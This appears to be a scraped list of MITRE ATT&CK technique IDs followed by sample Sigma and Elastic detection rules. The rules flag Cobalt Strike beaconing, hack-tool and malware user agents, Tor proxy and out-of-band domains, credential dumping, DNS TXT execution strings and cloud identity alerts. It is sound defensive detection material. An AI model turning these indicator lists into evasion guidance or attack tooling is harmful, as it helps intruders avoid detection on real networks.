- t1003
- t1003.001
- t1003.002
- t1003.003
- t1003.004
- t1003.006
- t1005
- t1008
- t1010
- t1012
- t1018
- t1020
- t1021
- t1021.001
- t1021.002
- t1021.003
- t1021.005
- t1021.006
- t1027
- t1027.001
- t1027.003
- t1027.004
- t1027.005
- t1027.009
- t1033
- t1036
- t1036.003
- t1036.005
- t1036.007
- t1040
- t1046
- t1047
- t1048
- t1048.003
- t1049
- t1053
- t1053.002
- t1053.005
- t1055
- t1055.001
- t1055.003
- t1055.009
- t1055.012
- t1056
- t1056.001
- t1057
- t1059
- t1059.001
- t1059.002
- t1059.003
- t1059.004
- t1059.005
- t1059.006
- t1059.007
- t1068
- t1069
- t1069.001
- t1069.002
- t1069.003
- t1070
- t1070.003
- t1070.004
- t1070.005
- t1070.006
- t1071
- t1071.001
- t1071.004
- t1072
- t1074
- t1074.001
- t1078
- t1078.001
- t1078.003
- t1078.004
- t1082
- t1083
- t1087
- t1087.001
- t1087.002
- t1087.004
- t1090
- t1090.001
- t1090.003
- t1095
- t1098
- t1102
- t1102.001
- t1102.003
- t1104
- t1105
- t1106
- t1110
- t1110.001
- t1112
- t1113
- t1114
- t1114.001
- t1115
- t1119
- t1123
- t1127
- t1127.001
- t1133
- t1134
- t1134.001
- t1134.002
- t1134.003
- t1135
- t1136
- t1136.001
- t1136.002
- t1137
- t1137.002
- t1137.006
- t1140
- t1176
- t1185
- t1190
- t1195
- t1195.001
- t1197
- t1199
- t1200
- t1201
- t1202
- t1203
- t1204
- t1204.001
- t1204.002
- t1207
- t1210
- t1211
- t1212
- t1216
- t1216.001
- t1217
- t1218
- t1218.001
- t1218.002
- t1218.003
- t1218.005
- t1218.007
- t1218.009
- t1218.010
- t1218.011
- t1218.013
- t1219
- t1220
- t1222
- t1222.001
- t1482
- t1484
- t1485
- t1486
- t1489
- t1490
- t1491
- t1491.001
- t1497
- t1497.001
- t1498
- t1499
- t1499.004
- t1505
- t1505.003
- t1518
- t1518.001
- t1526
- t1528
- t1529
- t1531
- t1537
- t1539
- t1543
- t1543.001
- t1543.003
- t1543.004
- t1546
- t1546.001
- t1546.002
- t1546.003
- t1546.007
- t1546.008
- t1546.009
- t1546.010
- t1546.011
- t1546.012
- t1546.015
- t1547
- t1547.001
- t1547.003
- t1547.004
- t1547.005
- t1547.006
- t1547.008
- t1547.009
- t1547.010
- t1548
- t1548.001
- t1548.002
- t1552
- t1552.001
- t1552.002
- t1552.004
- t1552.006
- t1553
- t1553.004
- t1555
- t1555.003
- t1555.004
- t1555.005
- t1556
- t1556.002
- t1557
- t1557.001
- t1558
- t1558.003
- t1559
- t1559.001
- t1559.002
- t1560
- t1560.001
- t1562
- t1562.001
- t1562.002
- t1562.004
- t1562.006
- t1563
- t1563.002
- t1564
- t1564.001
- t1564.002
- t1564.003
- t1564.004
- t1565
- t1566
- t1566.001
- t1566.002
- t1567
- t1567.002
- t1569
- t1569.002
- t1571
- t1572
- t1573
- t1574
- t1574.001
- t1574.002
- t1574.005
- t1574.006
- t1574.008
- t1574.011
- t1584
- t1587
- t1587.001
- t1588
- t1588.001
- t1588.002
- t1589
- t1593
- t1593.003
- t1595
- t1595.002
- t1608
- t1609
- t1611
- t1615
- t1621
- t1649
Sample rules
Microsoft 365 Mass download by a single user
- source: elastic
- technicques:
Description
Identifies when Microsoft Cloud App Security reports that a single user performs more than 50 downloads within 1 minute.
Detection logic
event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:"Mass download by a single user" and event.outcome:success
Cleartext Protocol Usage
- source: sigma
- technicques:
Description
Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels. Ensure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access.
Detection logic
condition: selection and 1 of selection_allow*
selection:
dst_port:
- 8080
- 21
- 80
- 23
- 50000
- 1521
- 27017
- 3306
- 1433
- 11211
- 15672
- 5900
- 5901
- 5902
- 5903
- 5904
selection_allow1:
action:
- forward
- accept
- 2
selection_allow2:
blocked: 'false'
Cisco Disabling Logging
- source: sigma
- technicques:
- t1562
- t1562.001
Description
Turn off logging locally or remote
Detection logic
condition: keywords
keywords:
- no logging
- no aaa new-model
Suspicious PsExec Execution - Zeek
- source: sigma
- technicques:
- t1021
- t1021.002
Description
detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one
Detection logic
condition: selection and not filter
filter:
name|startswith: PSEXESVC
selection:
name|endswith:
- -stdin
- -stdout
- -stderr
path|contains|all:
- \\
- \IPC$
Executable from Webdav
- source: sigma
- technicques:
- t1105
Description
Detects executable access via webdav6. Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/
Detection logic
condition: selection_webdav and selection_executable
selection_executable:
- resp_mime_types|contains: dosexec
- c-uri|endswith: .exe
selection_webdav:
- c-useragent|contains: WebDAV
- c-uri|contains: webdav
Default Cobalt Strike Certificate
- source: sigma
- technicques:
Description
Detects the presence of default Cobalt Strike certificate in the HTTPS traffic
Detection logic
condition: selection
selection:
certificate.serial: 8BB00EE
DNS TOR Proxies
- source: sigma
- technicques:
- t1048
Description
Identifies IPs performing DNS lookups associated with common Tor proxies.
Detection logic
condition: selection
selection:
query:
- tor2web.org
- tor2web.com
- torlink.co
- onion.to
- onion.ink
- onion.cab
- onion.nu
- onion.link
- onion.it
- onion.city
- onion.direct
- onion.top
- onion.casa
- onion.plus
- onion.rip
- onion.dog
- tor2web.fi
- tor2web.blutmagie.de
- onion.sh
- onion.lu
- onion.pet
- t2w.pw
- tor2web.ae.org
- tor2web.io
- tor2web.xyz
- onion.lt
- s1.tor-gateways.de
- s2.tor-gateways.de
- s3.tor-gateways.de
- s4.tor-gateways.de
- s5.tor-gateways.de
- hiddenservice.net
WebDav Put Request
- source: sigma
- technicques:
- t1048
- t1048.003
Description
A General detection for WebDav user-agent being used to PUT files on a WebDav network share. This could be an indicator of exfiltration.
Detection logic
condition: selection and not filter
filter:
id.resp_h|cidr:
- 10.0.0.0/8
- 127.0.0.0/8
- 172.16.0.0/12
- 192.168.0.0/16
- 169.254.0.0/16
selection:
method: PUT
user_agent|contains: WebDAV
Possible Impacket SecretDump Remote Activity - Zeek
- source: sigma
- technicques:
- t1003
- t1003.002
- t1003.003
- t1003.004
Description
Detect AD credential dumping using impacket secretdump HKTL. Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml
Detection logic
condition: selection
selection:
name|contains: SYSTEM32\
name|endswith: .tmp
path|contains|all:
- \
- ADMIN$
New Kind of Network (NKN) Detection
- source: sigma
- technicques:
Description
NKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. This rule looks for a DNS request to the ma>
Detection logic
condition: selection
selection:
query|contains|all:
- seed
- .nkn.org
Remote Task Creation via ATSVC Named Pipe - Zeek
- source: sigma
- technicques:
- t1053
- t1053.002
Description
Detects remote task creation via at.exe or API interacting with ATSVC namedpipe
Detection logic
condition: selection
selection:
name: atsvc
path: \\\*\IPC$
DNS TXT Answer with Possible Execution Strings
- source: sigma
- technicques:
- t1071
- t1071.004
Description
Detects strings used in command execution in DNS TXT Answer
Detection logic
condition: selection
selection:
answer|contains:
- IEX
- Invoke-Expression
- cmd.exe
record_type: TXT
Suspicious DNS Query with B64 Encoded String
- source: sigma
- technicques:
- t1048
- t1048.003
- t1071
- t1071.004
Description
Detects suspicious DNS queries using base64 encoding
Detection logic
condition: selection
selection:
query|contains: ==.
DNS Query to External Service Interaction Domains
- source: sigma
- technicques:
- t1190
- t1595
- t1595.002
Description
Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE
Detection logic
condition: selection
selection:
query|contains:
- .interact.sh
- .oast.pro
- .oast.live
- .oast.site
- .oast.online
- .oast.fun
- .oast.me
- .burpcollaborator.net
- .oastify.com
- .canarytokens.com
- .requestbin.net
- .dnslog.cn
Cobalt Strike DNS Beaconing
- source: sigma
- technicques:
- t1071
- t1071.004
Description
Detects suspicious DNS queries known from Cobalt Strike beacons
Detection logic
condition: 1 of selection*
selection1:
query|startswith:
- aaa.stage.
- post.1
selection2:
query|contains: .stage.123456.
Successful IIS Shortname Fuzzing Scan
- source: sigma
- technicques:
- t1190
Description
When IIS uses an old .Net Framework it’s possible to enumerate folders with the symbol “~”
Detection logic
condition: selection
selection:
cs-method:
- GET
- OPTIONS
cs-uri-query|contains: ~1
cs-uri-query|endswith: a.aspx
sc-status:
- 200
- 301
Suspicious User-Agents Related To Recon Tools
- source: sigma
- technicques:
- t1190
Description
Detects known suspicious (default) user-agents related to scanning/recon tools
Detection logic
condition: selection
selection:
cs-user-agent|contains:
- Wfuzz/
- WPScan v
- Recon-ng/v
- GIS - AppSec Team - Project Vision
Source Code Enumeration Detection by Keyword
- source: sigma
- technicques:
- t1083
Description
Detects source code enumeration that use GET requests by keyword searches in URL strings
Detection logic
condition: keywords
keywords:
- .git/
Exploit Framework User Agent
- source: sigma
- technicques:
- t1071
- t1071.001
Description
Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs
Detection logic
condition: selection
selection:
c-useragent:
- Internet Explorer *
- Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)
- Mozilla/4.0 (compatible; Metasploit RSPEC)
- Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)
- Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
- Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
- Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
- Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR={7DB0F6DE-8DE7-4841-9084-28FA914B0F2E};
SLCC1; .N
- Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
- Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like
Gecko) Chrome/4.0.221.6 Safari/525.13
- Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MAAU)
- Mozilla/5.0
- Mozilla/4.0 (compatible; SPIPE/1.0
- Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/35.0
- Sametime Community Agent
- X-FORWARDED-FOR
- DotDotPwn v2.1
- SIPDROID
- Mozilla/5.0 (Windows NT 10.0; Win32; x32; rv:60.0)
- Mozilla/6.0 (X11; Linux x86_64; rv:24.0) Gecko/20140205 Firefox/27.0 Iceweasel/25.3.0
- '*wordpress hash grabber*'
- '*exploit*'
Hack Tool User Agent
- source: sigma
- technicques:
- t1110
- t1190
Description
Detects suspicious user agent strings user by hack tools in proxy logs
Detection logic
condition: selection
selection:
c-useragent|contains:
- (hydra)
- ' arachni/'
- ' BFAC '
- ' brutus '
- ' cgichk '
- core-project/1.0
- ' crimscanner/'
- datacha0s
- dirbuster
- domino hunter
- dotdotpwn
- FHScan Core
- floodgate
- get-minimal
- gootkit auto-rooter scanner
- grendel-scan
- ' inspath '
- internet ninja
- jaascois
- ' zmeu '
- masscan
- ' metis '
- morfeus fucking scanner
- n-stealth
- nsauditor
- pmafind
- security scan
- springenwerk
- teh forest lobster
- toata dragostea
- ' vega/'
- voideye
- webshag
- webvulnscan
- ' whcc/'
- ' Havij'
- absinthe
- bsqlbf
- mysqloit
- pangolin
- sql power injector
- sqlmap
- sqlninja
- uil2pn
- ruler
- Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
(.NET CLR 3.5.30729)
Bitsadmin to Uncommon IP Server Address
- source: sigma
- technicques:
- t1071
- t1071.001
- t1197
Description
Detects Bitsadmin connections to IP addresses instead of FQDN names
Detection logic
condition: selection
selection:
c-useragent|startswith: Microsoft BITS/
cs-host|endswith:
- '1'
- '2'
- '3'
- '4'
- '5'
- '6'
- '7'
- '8'
- '9'
Crypto Miner User Agent
- source: sigma
- technicques:
- t1071
- t1071.001
Description
Detects suspicious user agent strings used by crypto miners in proxy logs
Detection logic
condition: selection
selection:
c-useragent|startswith:
- 'XMRig '
- ccminer
HTTP Request With Empty User Agent
- source: sigma
- technicques:
- t1071
- t1071.001
Description
Detects a potentially suspicious empty user agent strings in proxy log. Could potentially indicate an uncommon request method.
Detection logic
condition: selection
selection:
c-useragent: ''
Suspicious Base64 Encoded User-Agent
- source: sigma
- technicques:
- t1071
- t1071.001
Description
Detects suspicious encoded User-Agent strings, as seen used by some malware.
Detection logic
condition: selection
selection:
c-useragent|startswith:
- Q2hyb21l
- QXBwbGVXZWJLaX
- RGFsdmlr
- TW96aWxsY
Malware User Agent
- source: sigma
- technicques:
- t1071
- t1071.001
Description
Detects suspicious user agent strings used by malware in proxy logs
Detection logic
condition: selection
selection:
c-useragent:
- Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Chrome /53.0
- Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)
- Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
- Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
- HttpBrowser/1.0
- '*<|>*'
- nsis_inetc (mozilla)
- Wget/1.9+cvs-stable (Red Hat modified)
- Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)
- '*zeroup*'
- Mozilla/5.0 (Windows NT 5.1 ; v.*
- '* adlib/*'
- '* tiny'
- '* BGroom *'
- '* changhuatong'
- '* CholTBAgent'
- Mozilla/5.0 WinInet
- RookIE/1.0
- M
- Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
- Mozilla/4.0 (compatible;MSIE 7.0;Windows NT 6.0)
- backdoorbot
- Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1
(.NET CLR 3.5.30731)
- Opera/8.81 (Windows NT 6.0; U; en)
- Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1
(.NET CLR 3.5.30729)
- Opera
- Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
- MSIE
- '*(Charon; Inferno)'
- Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)
- Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)
- Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1)
- Mozilla/5.0 (Windows NT 10.0; Win64; x64)
- Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
- Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)
- Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C;
.NET4.0E; InfoPath.3)
- Mozilla/5.0 (Windows NT 6.1)
- AppleWebkit/587.38 (KHTML, like Gecko)
- Chrome/91.0.4472.77
- Safari/537.36
- Edge/91.0.864.37
- Firefox/89.0
- Gecko/20100101
- '* pxyscand*'
- '* asd'
- '* mdms'
- sample
- nocase
- Moxilla
- Win32 *
- '*Microsoft Internet Explorer*'
- agent *
- AutoIt
- IczelionDownLoad
- Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 10.0; .NET4.0C; .NET4.0E; Tablet
PC 2.0)
- record
- mozzzzzzzzzzz
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
- Havana/0.1
- antSword/v2.1
- rqwrwqrqwrqw
- qwrqrwrqwrqwr
- rc2.0/client
- TakeMyPainBack
- xxx
- '20112211'
- '23591'
- '901785252112'
- '1235125521512'
- '125122112551'
- B1D3N_RIM_MY_ASS
- AYAYAYAY1337
- iMightJustPayMySelfForAFeature
- ForAFeature
- Ares_ldr_v_*
- Microsoft Internet Explorer
- CLCTR
- uploader
- agent
- License
- vb wininet
- Client
- Lilith-Bot/3.0
- svc/1.0
- WSHRAT
- ZeroStresser Botnet/1.5
- OK
- Project1sqlite
- Project1
- DuckTales
- Zadanie
- GunnaWunnaBlueTips
- Xlmst
- GeekingToTheMoon
- SunShineMoonLight
- BunnyRequester
- BunnyTasks
- BunnyStealer
- BunnyLoader_Dropper
- BunnyLoader
- BunnyShell
- SPARK-COMMIT
- 4B4DB4B3
- SouthSide
- Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
PwnDrp Access
- source: sigma
- technicques:
- t1071
- t1071.001
- t1102
- t1102.001
- t1102.003
Description
Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity
Detection logic
condition: selection
selection:
c-uri|contains: /pwndrop/
Suspicious External WebDAV Execution
- source: sigma
- technicques:
- t1566
- t1584
Description
Detects executables launched from external WebDAV shares using the WebDAV Explorer integration, commonly seen in initial access campaigns.
Detection logic
condition: all of selection_* and not 1 of filter_main_*
filter_main_local_ips:
dst_ip|cidr:
- 127.0.0.0/8
- 10.0.0.0/8
- 172.16.0.0/12
- 192.168.0.0/16
- 169.254.0.0/16
- ::1/128
- fe80::/10
- fc00::/7
selection_execution:
c-uri|endswith:
- .7z
- .bat
- .dat
- .cmd
- .exe
- .js
- .lnk
- .ps1
- .rar
- .url
- .vbe
- .vbs
- .zip
selection_webdav:
c-useragent|startswith: Microsoft-WebDAV-MiniRedir/
cs-method: GET
HackTool - CobaltStrike Malleable Profile Patterns - Proxy
- source: sigma
- technicques:
- t1071
- t1071.001
Description
Detects cobalt strike malleable profiles patterns (URI, User-Agents, Methods).
Detection logic
condition: 1 of selection_* and not 1 of filter_main_*
filter_main_onedrive:
c-uri|contains: ://onedrive.live.com/
c-uri|startswith: http
selection_amazon_1:
c-uri: /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books
c-useragent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
cs-cookie|endswith: =csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996
cs-host: www.amazon.com
cs-method: GET
selection_amazon_2:
c-uri: /N4215/adj/amzn.us.sr.aps
c-useragent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
cs-host: www.amazon.com
cs-method: POST
selection_generic_1:
c-useragent:
- Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)
- Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2;
.NET CLR 3.0.30729; .NET4.0C; .NET4.0E )
- Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08
selection_generic_2:
c-useragent|endswith: ; MANM; MANM)
selection_onedrive:
c-uri|endswith: \?manifest=wac
cs-host: onedrive.live.com
cs-method: GET
selection_oscp:
c-uri|contains: /oscp/
cs-host: ocsp.verisign.com
Potential Base64 Encoded User-Agent
- source: sigma
- technicques:
- t1071
- t1071.001
Description
Detects User Agent strings that end with an equal sign, which can be a sign of base64 encoding.
Detection logic
condition: selection
selection:
c-useragent|endswith: '='
Suspicious User Agent
- source: sigma
- technicques:
- t1071
- t1071.001
Description
Detects suspicious malformed user agent strings in proxy logs
Detection logic
condition: 1 of selection* and not falsepositives
falsepositives:
- c-useragent: Mozilla/3.0 * Acrobat *
- cs-host|endswith:
- .acrobat.com
- .adobe.com
- .adobe.io
selection1:
c-useragent|startswith:
- user-agent
- 'Mozilla/3.0 '
- 'Mozilla/2.0 '
- 'Mozilla/1.0 '
- 'Mozilla '
- ' Mozilla/'
- Mozila/
- Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol
selection2:
c-useragent|contains:
- ' (compatible;MSIE '
- '.0;Windows NT '
- loader
selection3:
c-useragent:
- _
- CertUtil URL Agent
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0)
- Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
- HTTPS
- Erbium-UA-4ce7c27cb4be9d32e333bf032c88235a
- x
- xxx
Apache Segmentation Fault
- source: sigma
- technicques:
- t1499
- t1499.004
Description
Detects a segmentation fault error message caused by a crashing apache worker process
Detection logic
condition: keywords
keywords:
- exit signal Segmentation Fault
OneLogin User Assumed Another User
- source: sigma
- technicques:
Description
Detects when an user assumed another user account.
Detection logic
condition: selection
selection:
event_type_id: 3
New Root Certificate Authority Added
- source: sigma
- technicques:
- t1556
Description
Detects newly added root certificate authority to an AzureAD tenant to support certificate based authentication.
Detection logic
condition: selection
selection:
OperationName: Set Company Information
TargetResources.modifiedProperties.newValue|contains: TrustedCAsForPasswordlessAuth
Change to Authentication Method
- source: sigma
- technicques:
- t1098
- t1556
Description
Change to authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access.
Detection logic
condition: selection
selection:
Category: UserManagement
LoggedByService: Authentication Methods
OperationName: User registered security info
Users Added to Global or Device Admin Roles
- source: sigma
- technicques:
- t1078
- t1078.004
Description
Monitor and alert for users added to device admin roles.
Detection logic
condition: selection
selection:
Category: RoleManagement
OperationName|contains|all:
- Add
- member to role
TargetResources|contains:
- 7698a772-787b-4ac8-901f-60d6b08affd2
- 62e90394-69f5-4237-9190-012177145e10
Bitlocker Key Retrieval
- source: sigma
- technicques:
- t1078
- t1078.004
Description
Monitor and alert for Bitlocker key retrieval.
Detection logic
condition: selection
selection:
Category: KeyManagement
OperationName: Read BitLocker key
End User Consent
- source: sigma
- technicques:
- t1528
Description
Detects when an end user consents to an application
Detection logic
condition: selection
selection:
ConsentContext.IsAdminConsent: 'false'
Changes to Device Registration Policy
- source: sigma
- technicques:
- t1484
Description
Monitor and alert for changes to the device registration policy.
Detection logic
condition: selection
selection:
ActivityDisplayName: Set device registration policies
Category: Policy
End User Consent Blocked
- source: sigma
- technicques:
- t1528
Description
Detects when end user consent is blocked due to risk-based consent.
Detection logic
condition: selection
selection:
failure_status_reason: Microsoft.online.Security.userConsentBlockedForRiskyAppsExceptions
Certificate-Based Authentication Enabled
- source: sigma
- technicques:
- t1556
Description
Detects when certificate based authentication has been enabled in an Azure Active Directory tenant.
Detection logic
condition: selection
selection:
OperationName: Authentication Methods Policy Update
TargetResources.modifiedProperties|contains: AuthenticationMethodsPolicy
Azure Unusual Authentication Interruption
- source: sigma
- technicques:
- t1078
Description
Detects when there is a interruption in the authentication process.
Detection logic
condition: 1 of selection_*
selection_50097:
ResultDescription: Device authentication is required
ResultType: 50097
selection_50155:
ResultDescription: DeviceAuthenticationFailed
ResultType: 50155
selection_50158:
ResultDescription: ExternalSecurityChallenge - External security challenge was not
satisfied
ResultType: 50158
User Access Blocked by Azure Conditional Access
- source: sigma
- technicques:
- t1078
- t1078.004
- t1110
Description
Detect access has been blocked by Conditional Access policies. The access policy does not allow token issuance which might be sights≈ of unauthorizeed login to valid accounts.
Detection logic
condition: selection
selection:
ResultType: 53003
Device Registration or Join Without MFA
- source: sigma
- technicques:
- t1078
- t1078.004
Description
Monitor and alert for device registration or join events where MFA was not performed.
Detection logic
condition: selection and not filter_mfa
filter_mfa:
AuthenticationRequirement: multiFactorAuthentication
selection:
ResourceDisplayName: Device Registration Service
conditionalAccessStatus: success
Suspicious SignIns From A Non Registered Device
- source: sigma
- technicques:
- t1078
Description
Detects risky authencaition from a non AD registered device without MFA being required.
Detection logic
condition: selection
selection:
AuthenticationRequirement: singleFactorAuthentication
DeviceDetail.trusttype: ''
RiskState: atRisk
Status: Success
Login to Disabled Account
- source: sigma
- technicques:
- t1078
- t1078.004
Description
Detect failed attempts to sign in to disabled accounts.
Detection logic
condition: selection
selection:
ResultDescription: User account is disabled. The account has been disabled by an
administrator.
ResultType: 50057
Account Lockout
- source: sigma
- technicques:
- t1110
Description
Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password.
Detection logic
condition: selection
selection:
ResultType: 50053
Multifactor Authentication Interrupted
- source: sigma
- technicques:
- t1078
- t1078.004
- t1110
- t1621
Description
Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can’t pass the MFA challenge.
Detection logic
condition: 1 of selection_*
selection_500121:
ResultDescription|contains: Authentication failed during strong authentication request
ResultType: 500121
selection_50074:
ResultDescription|contains: Strong Auth required
ResultType: 50074
Discovery Using AzureHound
- source: sigma
- technicques:
- t1087
- t1087.004
- t1526
Description
Detects AzureHound (A BloodHound data collector for Microsoft Azure) activity via the default User-Agent that is used during its operation after successful authentication.
Detection logic
condition: selection
selection:
ResultType: 0
userAgent|contains: azurehound
Sign-ins by Unknown Devices
- source: sigma
- technicques:
- t1078
- t1078.004
Description
Monitor and alert for Sign-ins by unknown devices from non-Trusted locations.
Detection logic
condition: selection
selection:
AuthenticationRequirement: singleFactorAuthentication
DeviceDetail.deviceId: ''
NetworkLocationDetails: '[]'
ResultType: 0
Sign-ins from Non-Compliant Devices
- source: sigma
- technicques:
- t1078
- t1078.004
Description
Monitor and alert for sign-ins where the device was non-compliant.
Detection logic
condition: selection
selection:
DeviceDetail.isCompliant: 'false'
AWS EFS Fileshare Mount Modified or Deleted
- source: sigma
- technicques:
- t1485
Description
Detects when a EFS Fileshare Mount is modified or deleted. An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts.
Detection logic
condition: selection
selection:
eventName: DeleteMountTarget
eventSource: elasticfilesystem.amazonaws.com
SES Identity Has Been Deleted
- source: sigma
- technicques:
- t1070
Description
Detects an instance of an SES identity being deleted via the “DeleteIdentity” event. This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities
Detection logic
condition: selection
selection:
eventName: DeleteIdentity
eventSource: ses.amazonaws.com
AWS EFS Fileshare Modified or Deleted
- source: sigma
- technicques:
Description
Detects when a EFS Fileshare is modified or deleted. You can’t delete a file system that is in use. If the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare.
Detection logic
condition: selection
selection:
eventName: DeleteFileSystem
eventSource: elasticfilesystem.amazonaws.com
Restore Public AWS RDS Instance
- source: sigma
- technicques:
- t1020
Description
Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration.
Detection logic
condition: selection_source
selection_source:
eventName: RestoreDBInstanceFromDBSnapshot
eventSource: rds.amazonaws.com
responseElements.publiclyAccessible: 'true'
Activity from Suspicious IP Addresses
- source: sigma
- technicques:
- t1573
Description
Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence. These IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account.
Detection logic
condition: selection
selection:
eventName: Activity from suspicious IP addresses
eventSource: SecurityComplianceCenter
status: success
Logon from a Risky IP Address
- source: sigma
- technicques:
- t1078
Description
Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address.
Detection logic
condition: selection
selection:
eventName: Log on from a risky IP address
eventSource: SecurityComplianceCenter
status: success
Microsoft 365 - Unusual Volume of File Deletion
- source: sigma
- technicques:
- t1485
Description
Detects when a Microsoft Cloud App Security reported a user has deleted a unusual a large volume of files.
Detection logic
condition: selection
selection:
eventName: Unusual volume of file deletion
eventSource: SecurityComplianceCenter
status: success
Suspicious OAuth App File Download Activities
- source: sigma
- technicques:
Description
Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user.
Detection logic
condition: selection
selection:
eventName: Suspicious OAuth app file download activities
eventSource: SecurityComplianceCenter
status: success
Microsoft 365 - User Restricted from Sending Email
- source: sigma
- technicques:
- t1199
Description
Detects when a Security Compliance Center reported a user who exceeded sending limits of the service policies and because of this has been restricted from sending email.
Detection logic
condition: selection
selection:
eventName: User restricted from sending email
eventSource: SecurityComplianceCenter
status: success
Microsoft 365 - Potential Ransomware Activity
- source: sigma
- technicques:
- t1486
Description
Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware.
Detection logic
condition: selection
selection:
eventName: Potential ransomware activity
eventSource: SecurityComplianceCenter
status: success
Activity Performed by Terminated User
- source: sigma
- technicques:
Description
Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce. This is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.
Detection logic
condition: selection
selection:
eventName: Activity performed by terminated user
eventSource: SecurityComplianceCenter
status: success
Microsoft 365 - Impossible Travel Activity
- source: sigma
- technicques:
- t1078
Description
Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel.
Detection logic
condition: selection
selection:
eventName: Impossible travel activity
eventSource: SecurityComplianceCenter
status: success
Data Exfiltration to Unsanctioned Apps
- source: sigma
- technicques:
- t1537
Description
Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization.
Detection logic
condition: selection
selection:
eventName: Data exfiltration to unsanctioned apps
eventSource: SecurityComplianceCenter
status: success
Activity from Infrequent Country
- source: sigma
- technicques:
- t1573
Description
Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn’t recently or never visited by any user in the organization.
Detection logic
condition: selection
selection:
eventName: Activity from infrequent country
eventSource: SecurityComplianceCenter
status: success
Suspicious Inbox Forwarding
- source: sigma
- technicques:
- t1020
Description
Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address.
Detection logic
condition: selection
selection:
eventName: Suspicious inbox forwarding
eventSource: SecurityComplianceCenter
status: success
Okta API Token Revoked
- source: sigma
- technicques:
